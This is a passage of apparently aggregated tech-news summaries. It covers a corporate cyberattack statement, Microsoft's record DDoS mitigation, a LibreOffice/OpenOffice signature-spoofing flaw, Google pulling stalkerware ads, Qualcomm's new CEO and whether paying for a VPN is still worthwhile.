"As part of the investigation and containment, we have suspended affected systems and have informed the relevant external partners. The current results of our investigation indicate the incident was contained to the Americas with no known impact to other regions. We are working with appropriate third parties on this situation and will continue to take all necessary measures to serve our customers and business partners in a secure way. Protecting our customers and partners and maintaining their trust in us is our highest priority. Our investigation is ongoing and we are committed to transparent disclosure and will continue to provide updates as new information becomes available."

It's near-identical to a statement put out by Olympus last month following a cyberattack on its European, Middle East and Africa network.

Microsoft

Microsoft Says It Mitigated a 2.4 Tbps DDoS Attack, the Largest Ever (therecord.media) 39

Microsoft said its Azure cloud service mitigated a 2.4 terabytes per second (Tbps) distributed denial of service attack this year, at the end of August, representing the largest DDoS attack recorded to date. From a report: Amir Dahan, Senior Program Manager for Azure Networking, said the attack was carried out using a botnet of approximately 70,000 bots primarily located across the Asia-Pacific region, such as Malaysia, Vietnam, Taiwan, Japan, and China, as well as the United States. Dahan identified the target of the attack only as "an Azure customer in Europe."

The Microsoft exec said the record-breaking DDoS attack came in three short waves, in the span of ten minutes, with the first at 2.4 Tbps, the second at 0.55 Tbps, and the third at 1.7 Tbps. Dahan said Microsoft successfully mitigated the attack without Azure going down. Prior to Microsoft's disclosure today, the previous DDoS record was held by a 2.3 Tbps attack that Amazon's AWS division mitigated in February 2020.

Google

Google Unveils Cybersecurity Programs and Action Team (venturebeat.com) 21

An anonymous reader shares a report: By the end of 2021, cybercrime is expected to cost the world $6 trillion. And by 2025, this figure will climb to $10.5 trillion, according to Cybersecurity Ventures. There's been a rash of recent high-profile cyberattacks, including Colonial Pipeline, the SolarWinds breach, and JBS USA. That's perhaps why 80% of senior IT employees believe that their companies lack sufficient protection against cyberattacks, despite increased security investments made in 2020.

To address the challenges, Google today at Google Cloud Next 2021 debuted Work Safer, a program to help organizations, employees, and partners collaborate in hybrid work environments. It also unveiled a new security-focused task force -- the Cybersecurity Action Team -- and a security and resilience framework, in addition to enhanced security capabilities in Workspace. The announcements come after research showing that companies want cloud providers to increase their security efforts. According to a recent Tripwire survey, while the majority of enterprises believe that public cloud providers are doing enough to ensure security for users, it's "just barely adequate."

Bug

LibreOffice, OpenOffice Bug Allows Hackers To Spoof Signed Docs (bleepingcomputer.com) 7

LibreOffice and OpenOffice have pushed updates to address a vulnerability that makes it possible for an attacker to manipulate documents to appear as signed by a trusted source. Although the severity of the flaw is classified as moderate, the implications could be dire. BleepingComputer reports: The discovery of the flaw, which is tracked as CVE-2021-41832 for OpenOffice, was the work of four researchers at the Ruhr University Bochum. The same flaw impacts LibreOffice, which is a fork of OpenOffice spawned from the main project over a decade ago, and for that project it is tracked as CVE-2021-25635. If you're using either of the open-source office suites, you're advised to upgrade to the latest available version immediately. For OpenOffice, that would be 4.1.10 and later, and for LibreOffice, 7.0.5 or 7.1.1 and later. Since neither of these two applications offers auto-updating, you should do it manually by downloading the latest version from the respective download centers -- LibreOffice, OpenOffice. If you're using Linux and the aforementioned versions aren't available in your distribution's package manager yet, you are advised to download the "deb" or "rpm" package from the Download center or build LibreOffice from source. If updating to the latest version is not possible for any reason, you can always opt to completely disable the macro features in your office suite, or avoid trusting any documents containing macros.

Microsoft

Microsoft Warns of New Windows 11 Problems With Apps Using Unusual Registry Keys (betanews.com) 76

Microsoft has shared details of a new known issue with Windows 11. The company has confirmed that a problem exists with apps that use certain characters in registry keys. From a report: As a result of the discovery, Microsoft has put a compatibility hold in place that means people with problematic apps installed will not be offered Windows 11 via Windows Update. The issue is under investigation. It seems that the issue is related to, or is an extension of, one of the three initial known issues with Windows 11.

Google

Google Pulls 'Stalkerware' Ads That Promoted Phone Spying Apps (techcrunch.com) 9

Google has pulled several "stalkerware" ads that violated its policies by promoting apps that encouraged prospective users to spy on their spouses' phones. From a report: These consumer-grade spyware apps are often marketed to parents wishing to monitor their child's calls, messages, apps, photos and location, often under the guise of protecting against predators. But these apps, which are often designed to be installed surreptitiously and without the device owner's consent, have been repurposed by abusers to spy on the phones of their spouses.

[...] Last August, Google banned ads in users' search results that promoted apps that are designed "with the express purpose of tracking or monitoring another person or their activities without their authorization." But TechCrunch found five app makers were still advertising their stalkerware apps as recently as last week. "We do not allow ads promoting spyware for partner surveillance. We immediately removed the ads that violated this policy and will continue to track emerging behaviors to prevent bad actors from trying to evade our detection systems," a Google spokesperson told TechCrunch.

Businesses

'We're in a Hurry.' Qualcomm's New CEO Scrambles To Cope With a Global Chip Crisis. (wsj.com) 28

Cristiano Amon is the new boss of Qualcomm, a U.S. tech giant that designs semiconductors. His first task: Convince companies to make more chips for him -- and fast. From a report: Months before Cristiano Amon started as CEO of Qualcomm, he already was at work on his first crisis. To solve it, he sat in a mostly empty meeting room in Taipei and pleaded with executives from one of the world's biggest semiconductor makers for more chips. He needed the help so that Qualcomm, a designer of circuits that go into hundreds of millions of electronic devices every year, could chase new markets and meet demand from big customers such as Apple, Samsung Electronics and China's top handset-makers. In fact, he needed the assistance so much that he got permission from the Taiwanese government to arrive in March and then waited through a three-day quarantine. Once he and his team got to the meeting place in a Taipei hotel, they negotiated with counterparts across a large room outfitted with microphones and speakers to communicate.

"I'm a very big believer that sometimes you have to meet folks in person," said Mr. Amon, who was named CEO in January and officially took over in June. Many new CEOs across the business world had to adjust to their roles amid unprecedented pandemic-era restrictions, getting to know key employees without ever meeting them in person and managing offices and business relationships from far away. Few can say they had a more tumultuous transition than Mr. Amon, a gregarious Brazilian who revels in person-to-person contact. He is juggling a cluster of major challenges -- a global chip shortage, a sudden shift in a key market, and an unexpected acquisition opportunity -- while trying to put his own stamp on a company after working there for more than two decades. He wants to focus on an expansion beyond Qualcomm's core mobile-phone chip business, a shift that began before he took over. "I've been doing many things in parallel and I want to succeed in them all," he said in an interview. "I can't afford not to do them because we're in a hurry."

Cloud

Is It Time to Stop Paying For a VPN? (bdnews24.com) 113

"I'm done with paying for a virtual private network," writes the New York Times' lead consumer technology writer. The reality is that web security has improved so much in the last few years that VPN services, which charge monthly subscription fees that cost as much as Netflix, offer superfluous protection for most people concerned about privacy, some security researchers said.

Many of the most popular VPN services are now also less trustworthy than in the past because they have been bought by larger companies with shady track records. That's a deal-breaker when it comes to using a VPN service, which intercepts our internet traffic. If you can't trust a product that claims to protect your privacy, what good is it? "Trusting these people is really critical," Matthew Green, a computer scientist who studies encryption, said about VPN providers. "There's no good way to know what they're doing with your data, which they have huge amounts of control over...."

As a mainstream privacy tool, it's no longer an ideal solution. This sent me down a rabbit hole of seeking alternatives to paying for a VPN. I ended up using some web tools to create my own private network [on the cloud] for free, which wasn't easy... Not only is it free to use, but I no longer have to worry about trust because the operator of the technology is me.

"But I also learned that many casual users may not even need a VPN anymore," the article concludes. (Unless you're living in an authoritarian country and trying to reach information beyond its firewall.) One cybersecurity firm tells the Times that journalists with sensitive contacts or business executives carrying trade secrets might also still benefit from a VPN. But (according to the firm) the rest of us can just try two-factor authentication and keeping all of our software up-to-date. (And if you'd rather not use a public wifi network — use your phone as a mobile hot spot.)

The article also notes that 95% of the top 1,000 websites are now already encrypted with HTTPS, according to W3Techs.

It also points out that one VPN company accused of developing malware nonetheless spent close to a billion dollars to buy at least four other VPN services — and then also bought several VPN review sites, which then give top ratings to VPN services it owns...
